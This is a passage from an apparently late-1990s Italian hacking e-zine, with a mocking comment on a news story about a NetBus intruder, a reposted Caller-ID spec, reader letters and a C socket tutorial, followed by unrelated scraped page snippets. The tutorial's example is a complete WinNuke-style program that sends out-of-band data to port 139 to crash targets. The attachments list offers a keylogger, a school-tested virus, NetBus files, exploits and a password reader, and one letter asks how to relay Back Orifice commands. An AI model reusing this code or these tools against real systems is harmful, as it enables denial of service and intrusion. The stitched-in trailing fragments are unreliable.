digitalizzate, creando >seri danni e violando la privacy dei malcapitati. Il "capolavoro", del >quale andava particolarmente fiero, era lo "scherzetto" organizzato ai >danni di un perito assicurativo: l'uomo e' trasecolato, quando sul suo >monitor e' comparsa la scritta "Il computer e' stanco". Caxxo ma come avra' mai fatto questo genio hacker??????

10 >Ingegneri, avvocati, docenti universitari e studenti, caduti nella >trappola del geometra, si sono rivolti ai carabinieri, che hanno >individuato l'hacker. Ottenuto un mandato di perquisizione, i militari >del Nucleo operativo della Compagnia hanno bussato alla porta di G. F. che ha risposto "No grazie non compro niente" hihihi >(che nel web era conosciuto col soprannome di "Harris"). Il giovane e' Mi che ppppppaura!!! Il conte Drac...ehm...Harris!!!!!!!!!!!! >stato denunciato per una sfilza di reati che vanno dall'accesso >abusivo ai sistemi informatici alla diffusione di codici segreti, >dalla sostituzione di persona alla violazione della tutela dei >programmi per elaboratori, passando per la diffusione di software in >grado di danneggiare i computer. Ma sto cax di virus cosa sara' mai???? >"Harris", spiega il tenente Saverio Spoto, comandante della Compagnia >dei carabinieri, contattava le sue vittime attraverso Icq, un area di >conversazione offerta da numerosi provider di Internet. Utilizzando Sono i provider a offrire icq? Non sono competente in materia ma non credo proprio che siano i provider... >una chiave d'accesso acquistata fornendo generalita' false, durante le >"chiacchierate scritte" G. F. inviava ai computer delle vittime il >virus Netbus, che consente di "navigare" nel disco fisso dei computer >altrui durante il collegamento a Internet. Harris aveva anche un uhhhhhhhhhhh!!!!! il famoso virus Netbus!!!!! Un vero e proprio virus!!! Certo c'era bisogno di specificare, magari uno pensava che consentisse di navigare nel disco fisso dei computer altrui finito il collegamento a Internet! A computer spento magari!!! >proprio sito, nel quale offriva foto pornografiche, programmi-pirata e >files di ogni genere: chi si collegava al suo indirizzo, veniva >immediatamente contagiato dal virus informatico. Allora non e' una stronzata il fatto che il 44% degli italiani usano Internet solo x andare su siti XXX... e che il 32% lo usa x cercare e scaricarsi software pirata... ahahahah >Ottenuto l'accesso ai computer delle persone contattate in rete, >spiega il tenente Spoto, il giovane si impadroniva dell'identificativo >e della password segreta, utilizzati dalle vittime per collegarsi alla >rete: ne aveva alcune decine. Era solo l'inizio: subito dopo, iniziava Cavolo!!! Alcune decine!!! Quanto vorrei diventare un vero hacker come lui ;) hihihihihihihihihihihihihihihihihihihihihihihihihihihihihihihihihihihi >il furto di files e foto digitali, che sparivano misteriosamente dagli >hard disk dei proprietari e finivano su quello di G. F. Che uso >intendesse farne, ancora non si sa: i carabinieri sospettano che il >pirata informatico abbia forzato anche i sistemi di uffici pubblici e >professionisti, entrando cosi' in possesso di dati estremamente >riservati. >Gli investigatori non spiegano come, ma alla fine sono riusciti a Certo che e' difficile leggere un ip in qualke log file, andare dalla tin e dire "Scusi chi e' questo x.x.x.x???" Ricordatevi che nella polizia ci sono solo ex-smanettoni o ex-hacker che cosa credevate ;))))))))))))) >identificare il geometra, che ora rischia una condanna fra uno e >cinque anni di carcere. Dal comandante della Compagnia, partono ora Da uno a cinque anni...se ti prendono a usare bo netbus e altri 10 trojan che ti danno 60 anni di carcere?

11 >due appelli: I frequentatori dell'icq farebbero bene a fare una >scansione del disco fisso, con un antivirus aggiornato. Chi ha avuto >contatti con Harris, se ha il dubbio che i suoi archivi siano stati >forzati, venga a trovarci al Comando. L'indirizzo, stavolta non >telematico, e' via Nuoro 9 Cagliari. > LUIGI ALMIENTO Per questo numero e' tutto questo art vi e' stato segnalato da me cioe' io che sono il mitico (non molto in verita') Spero che ognuno di voi possa capire se quello che e' stato preso era un hacker o un lamer...cmq a voi l'ardua scelta... e speriamo che queste parole non siano buttate al vento come foglie d'autunno... ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ Mailzz viva i lettori: ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ» ºÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ º º³ L'ANGOLO DELLA POSTA ³º ºÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙº ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ From: (Jeff Sicherman) Subject: Caller-ID Specifications This is a copy of the data sheet picked up at the Rockwell booth at the COMDEX show. INTRODUCTION Calling Number Delivery (CND), better known as Caller ID, is a telephone service intended for residential and small business customers. It allows the called Customer Premises Equipment (CPE) to receive a calling party's directory number and the date and time of the call during the first four second silent interval in the ringing cycle. The customer must contact a Bellcore Client Company to initiate CND service. According to Pacific Bell representatives, the following states and district currently support CND service: Delaware, District of Columbia, Florida, Georgia, Idaho, Kentucky, Louisiana, Maine, Maryland, Nebraska, Nevada, New Jersey, Oklahoma, Tennessee, Vermont, Virginia, and West Virginia. The following states are scheduled to support CND service by April, 1992: Alaska, Arizona, California, Colorado, Illinois, Indiana, Iowa, Massachusetts, Mississippi, New Hampshire, New York, North Carolina, North Dakota, Ohio, Oregon, Rhode Island, and South Carolina. PARAMETERS The data signalling interface has the following characteristics: Link Type: 2-wire, simplex Transmission Scheme: Analog, phase-coherent FSK Logical 1 (mark) /- 12 Hz Logical 0 (space) /- 22 Hz Transmission Rate: 1200 bps Transmission Level: /- dbm into 900 ohm load (I have copied this data as presented. I believe the transmission level is meant to be dbm.) PROTOCOL The protocol uses 8-bit data words (bytes), each bounded by a start bit and a stop bit. The CND message uses the Single Data Message format shown below.

12 Channel Carrier Message Message Data Seizure Signal Type Length Word(s) Word Signal Word Word Checksum CHANNEL SEIZURE SIGNAL The channel seizure is 30 continuous bytes of 55h ( ) providing a detectable alternating function to the CPE (i.e. the modem data pump). CARRIER SIGNAL The carrier signal consists of 130 +/- 25 ms of mark (1200 Hz) to condition the receiver for data. MESSAGE TYPE WORD The message type word indicates the service and capability associated with the data message. The message type word for CND is 04h ( ). MESSAGE LENGTH WORD The message length word specifies the total number of data words to follow. DATA WORDS The data words are encoded in ASCII and represent the following information: o The first two words represent the month o The next two words represent the day of the month o The next two words represent the hour in local military time o The next two words represent the minute after the hour o The calling party's directory number is represented by the remaining words in the data word field If the calling party's directory number is not available to the terminating central office, the data word field contains an ASCII "O". If the calling party invokes the privacy capability, the data word field contains an ASCII "P". CHECKSUM WORD The Checksum Word contains the twos complement of the modulo 256 sum of the other words in the data message (i.e., message type, message length, and data words). The receiving equipment may calculate the modulo 256 sum of the received words and add this sum to the reveived checksum word. A result of zero generally indicates that the message was correctly received. Message retransmission is not supported. EXAMPLE CND SINGLE DATA MESSAGE An example of a received CND message, beginning with the message type word, follows: h= Calling number delivery information code (message type word) 12h= 18 decimal; Number of data words (date,time, and directory number words) ASCII 30,39= 09; September ASCII 33,30= 30; 30th day ASCII 31,32= 12; 12:00 PM ASCII 32,34= 24; 24 minutes (i.e., 12:24 PM) ASCII 36,30,39,35,35,35,31,32,31,32= (609) ; calling party's directory number 51h= Checksum Word

13 DATA ACCESS ARRANGEMENT (DAA) REQUIREMENTS To receive CND information, the modem monitors the phone line between the first and second ring bursts without causing the DAA to go off hook in the conventional sense, which would inhibit the transmission of CND by the local central office. A simple modification to an existing DAA circuit easily accomplishes the task. (I will mail the Rockwell data sheet, which includes the suggested schematic diagram.) MODEM REQUIREMENTS Although the data signalling interface parameters match those of a Bell 202 modem, the receiving CPE need not be a Bell 202 modem. A V bps modem receiver may be used to demodulate the Bell 202 signal. The ring indicate bit (RI) may be used on a modem to indicate when to monitor the phone line for CND information. After the RI bit sets, indicating the first ring burst, the host waits for the RI bit to reset. The host then configures the modem to monitor the phone line for CND information. (I'm skipping some Rockwell-specific information here.) According to Bellcore specifications, CND signalling starts as early as 300 ms after the first ring burst and ends at least 475 ms before the second ring burst. APPLICATIONS Modem manufacturers will soon be implementing new modem features based on CND information as this service becomes widely available. Once CND information is received the user may process the information in a number of ways. 1. The date, time, and calling party's directory number can be displayed. 2. Using a look-up table, the calling party's directory number can be correlated with his or her name and the name displayed. 3. CND information can also be used in additional ways such as for: a. Bulletin board applications b. Black-listing applications c. Keeping logs of system user calls, or d. Implementing a telemarketing data base REFERENCES For more information on Calling Number Delivery (CND), refer to Bellcore publications TR-TSY and TR-TSY To obtain Bellcore documents contact: Bellcore Customer Service 60 New England Avenue, Room 1B252 Piscataway, NJ (201) Ciao Zero Cool, com'e' Praga? E le ceche??eh!eh! Cmq ti volevo dire che avrei scritto una articoletto su 3 semplici backdoors (aggiungere un user,manipolare.rhosts e inetd.conf per crearsi una porta.. cose che saprai a memoria) e mi chiedevo se le potevo mettere su Newbies nø2. Se non posso dimmelo pure che non mi offendo! Poi ti volevo chiedere qualche informazione su come e' strutturata la crew, chi sono i piu' bravi ecc.

14 Byez, Hamelin Re: si il tuo articolo e' ben accetto scusa se lo scrivo qua ed ora ma non trovo la tua mail proprio + e il txt con su scritto cio'e'l' unica cosa che mi e'rimasta fatti sentire ZeroCool Re: l'art di Hamelin e' presente su questo numero :))) alla fine ci ha ribeccati lui eheheheh N0bodY Ciao zero, ascolta, Ho un amico che fa il sistemista ed e'in grado di controllare il traffico delle linee telefoniche! Se io gli do dei numeri verdi e lui scopre che ci si collega sempre un sacco di gente, significa che il GREEN e' piuttosto sicuro oppure il contrario? Andrew Coleman Re: si mi farebbe piacere ricevere solo dei manuali e dei txt sulle linee telefoniche per quanto riguarda i green non ne voglio proprio sapere ZeroCool Vorrei esprimere la mia ammirazione verso il vostro fantastico gruppo Vai ragazzi siete i migliori Coda RE: stragrazie millexxxxx ZeroCool RE: oddio questo chissa' che si e' bevuto prima di sedersi davanti al computer..o avra' fumato??? hihihi tnx cmq ricorda che e' un lavoro di squadra nonostante ci siamo io e zero (e dal prox num nosferatu) come "capi", noi siamo solo dei coordinatori e questa e-zine e' bella imo xche' non e' mia o tua e' un po' di tutti ognuno la sente propria e x questo vuole miglio rarla dando il meglio di se' coi propri articoli N0bodY ciao zerocool sono un ragazzo che ne vuole sapere un pacco ma che, come te, capisce poco l'inglese. navigando ho trovato molti siti sull'hacking ma il piu' chiaro e' sicuramente il vostro perche' e' in italiano e spiega testualmente na frega (molte) di cose. un po sto a lecca': non sono uno che ottiene le cose leccando il culo su irc ma, visto che sembri molto disponibile, ti chiedo una cosa proprio da + lamer che non si puo': -cos'e' un volmetro? (non so manco se e' software o hardware) per ora mi interesso dei green perche' appena ne trovero' uno potro dedicarmi alla navigazione serrata per trovare strafigherie. una cosa tra amici: una volta che c'ho il green che cazzo devo scriverci nella user e password?????????? se mi rispondi sei un grande mo vengo sui vostri chan IRC ciao:):) RE: ciao grazie per i complimenti [ps ho un'inglesina che mi sta dando lezioni di lingua e penso di poter avere un livello accettabile ] ; per quanto riguarda un volmetro che so' io e' a livello hardware e per quanto riguarda i green se vuoi un consiglio lasciali perdere o rischi di fare una brutta fine ZeroCool PS DI N0bodY88 = cosa intendevi zero con la frase "Ho un inglesina che mi sta dando lezioni di lingua"??? Ahhh io e i miei doppisensi... hihihi

15 Ola...ho visto il tuo indirizzo sulla pagina web e visto che non so a chi rivolgermi spero in un tuo aiuto... Questo e' il problema: voglio lanciare Boclient (quello per Dos) su un pc di un boservizato da una shell dos, in modo che i comandi indirizzati ad un secondo boservizato partano da quel PC e non dal proprio... il mio problema e' che non riesco a far eseguire boclient al primo pc.. Questa e' la procedura che seguo: 1-Appadd command.com 23 2-apro telenet 3-lancio boclient.exe (devo mettere qualche parametro?) e mi si inchioda qui Telnet...ma se faccio un process list vedo il processo attivo... Ho provato a lanciare direttamente anche Appadd c:\boclient.exe 23 ma quando apro telent sulla porta 23 non risponde niente ;-( Che devo fare?...ma si puo fare una cosa del genere? Ho fatto mille prove...ma il risultato e' sempre quello ;-( byez Snafuz RE: Ciao in questo numero dell'ezines ci dovrebbe essere la risposta per la tua domanda "ah na cosa sapete che esiste un sito in internet con tutti i numeri verdi esitenti italiani [nooo] e anche quelli non doumentati nelle guide [nooooo] si, bhe ma ci vuole un caro account se qualcuno e' disposto ad aiutarmi nel trovarlo mi contatti ah gia' il sito in questione si chiama ciao a tutti ZeroCool" Che sappia io non ci sono quelli non documentati nelle guide...sorry. Blum RE: Mha a me han detto cosi'cmq magari sbaglio cmq e'un argomento che non mi interessa piu'cmq colgo l'occasione per salutarti sei miticissimo ZeroCool Ciao Sono Uncle Jack, vi sto seguendo su ahccc da due mesi circa ed esco dall ombra per due motivi: Innanzi tutto complimenti per il primo numero dell' E-ZINE L'ho scaricato stampato e letto nel giro di una sera!!!! Spero che le uscite continuino anche se penso che non sia un lavoro da poco mettere insieme un lavoro di quelle dimensioni. Comunque sono in attesa del secondo numero ;-)) Secondo ho letto il post di Newbie 1,1 riguardo il futuro di ahccc e condivido il pensiero che negli ultimi periodi e' scaduto parecchio di qualita', io mi sono ridotto a leggere solo i post di alcuni di voi lasciando perdere il resto. Trovo quindi FANTASTICA l' idea della mailing list e siccome sul Vs. sito la pagina e' in costruzione...e non e' meglio specificato a chi rivolgersi, chiedo a voi ma e' come se lo chidessi a tutto il gruppo se per cortesia mi voleste inserire nella lista consentendomi di continuare a seguire i post di gente che ha contribuito a risvegliare la mia curiosita di studiare ed imparare (NB. ho 32 anni e il mio primo login risale all aprile 1992 poi per motivi di lavoro e famiglia ho dovuto mollare ho ripreso grazie a voi). Nella speranza di poter sedere alla vostra tavola per poter appagare la mia sete di sapere vi saluto. RE: Non ho parole sei strabenvenuto da noi e la mailing list e' gia'attiva ZeroCool

16 hi ZeroCool, volevo avvertirti che nel tuo sito non ci sono i "testi tradotti", potresti mandarmi i testi via o darmi un indirizzo dove possa trovare questi testi? RE: Il nostro traduttore ufficiale si sta dando da fare al riguardo ZeroCool RE: Tutti le traduzioni sono sempre state messe nelle e-zine fino adesso, ma appena rifacciamo il sito faremo la page traduzioni N0bodY scusa, ti volevo anche chiedere se potevo pubblicare la vostra rivista sul mio sito, come.to/lopks con la "rivista" della precedente mail intendevo dire la e-zine di ZeroCool e N0bodY88... by lopks RE: certo te la mandero'al + presto. ZeroCool ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ» ºÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ º º³ RIEPILOGO LINK IN ORDINE ALFABETICO ³º ºÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙº ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ [ D.I.B > ] [ NetRunners > ] [ NewBies > ] [ RingZ3rO > ] [ Softpj > ] [ Spaghetti Phreakers > ] [ Spippolatori > ] [ Vana - Imago > ] ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ ² ÛÛ ÛÛ ÛÛÛÛ ÛÛÛÛÛÛÛ ÛÛÛÛÛÛÛÛÛÛÛÛÛ Û ² ² ÛÛÛ ÛÛ ÛÛ ÛÛ ÛÛ ÛÛÛ ÛÛÛ ² ² ÛÛ²ÛÛ ÛÛ ÛÛ ÛÛÛÛ ÛÛ ÛÛÛÛ ÛÛ²ÛÛ ÛÛÛ ÛÛÛ ² ² ÛÛÛÛÛÛÛ ÛÛ ÛÛ ÛÛ ÛÛ ÛÛ ÛÛÛÛÛÛÛ ÛÛÛ ÛÛÛ ² ² ÛÛ ÛÛ ÛÛÛÛÛ ÛÛÛÛÛ ÛÛÛÛ ÛÛÛÛÛÛÛ ÛÛ ÛÛ ÛÛÛ ÛÛÛ ² ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ 2 PAROLE SUGLI ALLEGATI: - anti-s.zip = file con altri 5 doc presi dalla mitica guida fatta da Anti-Social. - AntiMelissa = questa e' una voce di registro che se aggiunta al ns registry ci rende non attaccabili dal tanto decantato melissa.tnx Sephy - cmanager.exe = programmino usato in alcuni netcafe e del quale unlt ci ha fatto lieto dono :))), trovate una descrizione del prog nella sezione "hacking e altro" dove ulnt spiega tutto quello che sa sui netcafe :-))))))) - CookBook = zip con il (speriamo diventi) famoso CookBook di ElectroRipper in anteprima x NewBies da uno dei + attivi degli scrittori della ns e-zine. - file3ds.zerocool = file 3ds attinente all'articolo in cui ZeroCool parla di programmazione di demo x nintendo Guida di Kalidor all'hacking per Win95-98.zip = file contenente la guida fatta dal mitico Kalidor. - IcqExploit.htm = questo e' un file fatto da Sephy il cui uso e' spiegato nel suo articolo intitolato ICQ EXPLOIT.

17 - italiano.lng = Traduce netbus 2 dall'inglese all'italiano... inseritelo nella dir LANG e fate opzioni nel menu di netbus...by Sephy - KeyLogger.zip = come capirete dal nome (ma no!) questa e' un keylogger (ma va!) che Sephy ci spiega ad usare in uno dei suo articoli, e cmq trovate la documentazione all'interno se avete fretta di usarlo. - naggabox.zip e omega.zip = file in cui sono riportati gli schemi di una blue box che nonstante se ne dica secondo me funziona ankoroggi qui in italia ;-) - NetBusEliminator = utile programmino fatto dal ns Quequero che praticamente va a modificare le proprieta' del server di NetBus cosicche' se siete infetti vedrete il server caricarsi al riavvio del pc senza che lo stesso sia + nascosto, individuandone quindi anke il nome. Un tnx 1000 a Quequero da parte di tutti noi. - NetbusICO.zip = alcune icone da usare secondo quanto spiegato da Sephy in uno dei suo articoli (ma quanti ne ha fatti sto qua??? hihihi) - newbies.asm = virus fatto da Caos83 e provato nella sua scuola, se avete un po' di cultura di so e hacking installatevelo e provate a rispondere alle domande che vi verranno poste ;-) - r0_pesentry.zip = file zip che e' collegato all'articolo di Kill3xx (dei Ring0...i migliori!) - rain10.zip = file accluso xche' chiamato in causa da SoftWord x il suo articolo sull'overclock; - SourceCode.zip = file contenenti info e codice che ipley ha spiegato (si proprio l'articolo dove si spiega come fare una backdoor!) - supporti.zip = file allegato con i sorgenti, l'exe e molti.pas moooooooolto interessanti dei quali Master parla nel suo articolo ^ ^ - zerocool.zip = file contenente una serie di exploits forntici dal ns mitico redattore, un prog x leggere le pass del prog CuteFtp e un paio di immagini da luis elezionate eheheh. N0bodY88 PS DELL'ULTIMO MINUTO:dato che non so quanti di voi hanno voglia di scaricarsi una e-zine di un 1 mega e mezzo, abbiamo deciso di dividere la e-zine in 2 zip, 1 contenente questa e-zine e altri articoli o guide, mentre nell'altro trovate i prog che son sopra elencati, ma questo non vuol dire che non dovete scarcarli entrambi :PPP N0bodY88 ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ ² ÛÛÛÛÛÛÛÛÛÛÛÛÛ ÛÛ ÛÛÛÛÛÛÛÛÛÛÛÛÛ ÛÛÛÛÛÛÛÛ ÛÛÛÛÛÛ ÛÛ ÛÛ ² ² ÛÛÛ ÛÛ ÛÛÛ ÛÛ²²²²ÛÛ ÛÛ²²ÛÛ ÛÛÛ ÛÛ ² ² ÛÛÛ ÛÛ ÛÛ ÛÛÛ ÛÛ²²²²ÛÛ ÛÛÛÛ ÛÛ ÛÛ²ÛÛ ÛÛ ² ² ÛÛÛ ÛÛ ÛÛ ÛÛÛ ÛÛ²²²²ÛÛ ÛÛ ÛÛ ÛÛ ÛÛÛÛÛÛÛ ÛÛ ² ² ÛÛÛ ÛÛÛÛÛÛÛ ÛÛÛ ÛÛÛÛÛÛÛÛ ÛÛ ÛÛ ÛÛ ÛÛ ÛÛ ÛÛÛÛÛÛ ² ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ ÕÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ ³ ::::::::::::::::::::::::::: ÆÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ͵ ³ Titolo: Corso di C - III Parte³ ÆÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ͵ ³ di : ElectroRipper ³ ÆÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ͵ ³ Scritto il : 21/4/99 ³ ÆÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ͵ ³ Pericolo: Û ³ ÔÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ;

18 E L E C T R O R I P P E R P R E S E N T A C O R S O D I C I I I P U N T A T A Stavolta parliamo dei...socket! Oramai dovreste avere un'idea generale del linguaggio e di come programmare in C, semplici applicazioni, dopo aver letto le prime due puntate di questo corso, riguardanti la prima la sintassi di base, e la seconda la gestione dei files, quindi stavolta tratteremo un argomento un po' piu' specifico. Dato che e' un argomento lunghetto lo divideremo in due puntate. Un socket altro non e' che un cazzariello che gestisce per noi le parti piu' a basso livello di una connessione, lasciandoci cosi' liberi di pensare al programma e risparmiandoci un casino di fatica. Faro' riferimento a Unix e Linux ma in Windows non dovrebbe cambiare molto. Ecco gli headers che dovrete includere nei vostri programmi per il supporto dei socket di base : sys/socket.h sys/types.h netinet/in.h netdb.h Per Windows95 la libreria che si occupa della gestione dei socket e' wsock32.dll Un socket viene riconosciuto dal C per il suo descriptor. Proprio come un file infatti un socket ha un numero intero che lo identifica, e glielo assegniamo con la funzione socket, che usa la seguente sintassi : int socket(int domain, int type, int protocol); Ecco le costanti piu' comuni da passare come domain : AF_UNIX (protocolli interni Unix) AF_INET (protocolli internet ARPA) AF_ISO (protocolli ISO) Come type potete usare invece : SOCK_STREAM (TCP) SOCK_DGRAM (UDP) SOCK_RAW (Il programma stesso costruisce i pacchetti) Come protocol potete passare 0 in modo che scelga automaticamente quello + adatto. L'int restituito sara' appunto il descriptor del socket che abbiamo appena creato. Poi dobbiamo comunicare al socket a quale indirizzo collegarsi e su quale porta e per farlo utilizziamo la struttura sockaddr, o meglio la struttura sockaddr_in con un cast. struct sockaddr_in{ short sin_family; short sin_port; struct in_addr sin_addr } sin_addr e' una struttura di tipo in_addr, cioe'...

19 struct in_addr{ long s_addr; } In sin_family potete schiaffarci AF_INET, sin_port e' la porta, e sin_addr e'...indovinate un po'... esatto, l'indirizzo del server. Internet usa valori ordinati nel modo inverso a quello dei processori intel, (i cosiddetti host byte order e network byte order) quindi per inserire un valore in sin_port o sin_addr dovremo prima convertirlo, e possiamo farlo con queste funzioni : unsigned long int htonl(unsigned long int hostlong); unsigned short int htons(unsigned short int hostshort); unsigned long int ntohl(unsigned long int netlong); unsigned short int ntohs(unsigned short int netshort); il cui significato mi sembra abbastanza ovvio (se non dovesse esserlo vi bastera' scrivere "man htonl" per avere una descrizione piu' dettagliata) In sin_addr non va inserito ovviamente l'indirizzo alfanumerico, ma l'ip numerico. Per trovare l'ip numerico di uno alfanumerico usiamo la funzione : struct hostent *gethostbyname(char *name); name e' la stringa che rappresenta l'indirizzo alfanumerico. La funzione restituisce un puntatore a una struttura hostent. L'ip che ci interessa e' contenuto nella struttura puntata dal valore di ritorno di gethostbyname, nel campo char *h_addr. Una volta che abbiamo creato il socket dobbiamo connetterlo, e lo possiamo fare con la funzione : int connect(int sockfd, struct sockaddr *serv_addr, int addrlen ); sockfd e' il descriptor del socket (valore di ritorno della funzione socket) serv_addr e' la struttura sockaddr che contiene l'indirizzo e la porta, addrlen e' la dimensione di serv_addr Il valore di ritorno e' 0 in caso di successo. Per scrivere ad un socket (spedire dati quindi) si puo' usare la funzione write : int write (int sockfd, char *buffer, int buflen); sockfd e' il descriptor del socket buffer punta al primo carattere della stringa da inviare buflen e' il numero di bytes da scrivere. Per leggere invece (ricevere dati quindi) si usa la stessa sintassi, ma con la funzione read ( int read (int sockfd, char *buffer, int buflen); ), solo che stavolta buffer punta al primo byte della memoria dove si vogliono salvare i dati letti, e buflen sono i caratteri da leggere. Queste due funzioni si basavano sul fatto che il socket e' rappresentato fondalmente come un intero, quindi possiamo usare il suo descriptor come se fosse un file. Ci sono pero' due funzioni che fanno la stessa cosa, ma che sono specifiche per i socket : int recv(int s, void *buf, int len, unsigned int flags);

20 int send(int s, const void *msg, int len, unsigned int flags); vabbe' s e' il descriptor, ecc. ecc. I flag li potete settare a zero oppure potete usare le seguenti costanti : MSG_OOB (out of band) MSG_DONTROUTE Alla fine quando dobbiamo chiudere il socket usiamo shutdown(int socket, int mode); dove mode e' un valore da 0 a 2 (0 chiude le operazioni di scrittura ma continua a ricevere, 1 continua solo a trasmettere, 2 viene chiuso del tutto) E poi per liberare le risorse utilizzate dal socket: closesocket (int socket); E adesso che vi sarete rotti il cazzo finalmente un esempio! Un semplice nuker. #include <stdio.h> #include <string.h> #include <netdb.h> #include <netinet/in.h> #include <sys/types.h> #include <sys/socket.h> #include <unistd.h> #define porta 139 // La classica vittima del nuke main(int argc, char *argv[]){ char *stringa = "sampei"; struct sockaddr_in indirizzo; struct hostent *hp; int socchett; socchett = socket (PF_INET, SOCK_STREAM, 0); // Crea il socket hp = gethostbyname(argv[1]); // Trova l'ip numerico bzero((char *)&indirizzo,sizeof(indirizzo));// Riempie di 0 la strutt. bcopy(hp->h_addr, (char *)&indirizzo.sin_addr, hp->h_length); // Il segno -> indica il membro della struttura puntata. Ad esempio // se ho una struttura di nome computer,con un campo chiamato CPU, // e un puntatore alla struttura (*computer) chiamato computerp, e' // la stessa cosa fare "computer.cpu = 486" o "computerp->cpu = 486" indirizzo.sin_family = AF_INET; indirizzo.sin_port = htons(porta); connect(socchett,(struct sockaddr *)&indirizzo,sizeof(indirizzo)); // Dato che abbiamo riempito una struttura di tipo sockaddr_in ma // connect richiede una di tipo sockaddr, allora utilizziamo un cast send (socchett, stringa, strlen(stringa), MSG_OOB); // Mandiamo una stringa out of band sulla 139 per nukkare close(socchett); } Il programma prende l'indirizzo alfanumerico passatogli sulla riga di comando trova l'ip numerico e invia una stringa OOB sulla 139.

Talento LAB 4.1 - UTILIZZARE FTP (FILE TRANSFER PROTOCOL) L'UTILIZZO DI ALTRI SERVIZI INTERNET. In questa lezione imparerete a:

Talento LAB 4.1 - UTILIZZARE FTP (FILE TRANSFER PROTOCOL) L'UTILIZZO DI ALTRI SERVIZI INTERNET. In questa lezione imparerete a: Lab 4.1 Utilizzare FTP (File Tranfer Protocol) LAB 4.1 - UTILIZZARE FTP (FILE TRANSFER PROTOCOL) In questa lezione imparerete a: Utilizzare altri servizi Internet, Collegarsi al servizio Telnet, Accedere

Dettagli

Creare una applicazione Winsock di base

Creare una applicazione Winsock di base Creare una applicazione Winsock di base Usiamo le API Winsock incluse in Creare un progetto per una Socket Windows (in Dev C++) Selezionare la file New Projects Selezionare Empty Project Salvare

Dettagli

Come difendersi dai VIRUS

Come difendersi dai VIRUS Come difendersi dai VIRUS DEFINIZIONE Un virus è un programma, cioè una serie di istruzioni, scritte in un linguaggio di programmazione, in passato era di solito di basso livello*, mentre con l'avvento

Dettagli

12.5 UDP (User Datagram Protocol)

12.5 UDP (User Datagram Protocol) CAPITOLO 12. SUITE DI PROTOCOLLI TCP/IP 88 12.5 UDP (User Datagram Protocol) L UDP (User Datagram Protocol) é uno dei due protocolli del livello di trasporto. Come l IP, é un protocollo inaffidabile, che

Dettagli

Funzioni di base. Manualino OE6. Outlook Express 6

Funzioni di base. Manualino OE6. Outlook Express 6 Manualino OE6 Microsoft Outlook Express 6 Outlook Express 6 è un programma, incluso nel browser di Microsoft Internet Explorer, che ci permette di inviare e ricevere messaggi di posta elettronica. È gratuito,

Dettagli

Zeroshell come client OpenVPN

Zeroshell come client OpenVPN Zeroshell come client OpenVPN (di un server OpenVpn Linux) Le funzionalità di stabilire connessioni VPN di Zeroshell vede come scenario solito Zeroshell sia come client sia come server e per scelta architetturale,

Dettagli

Ci relazioniamo dunque siamo

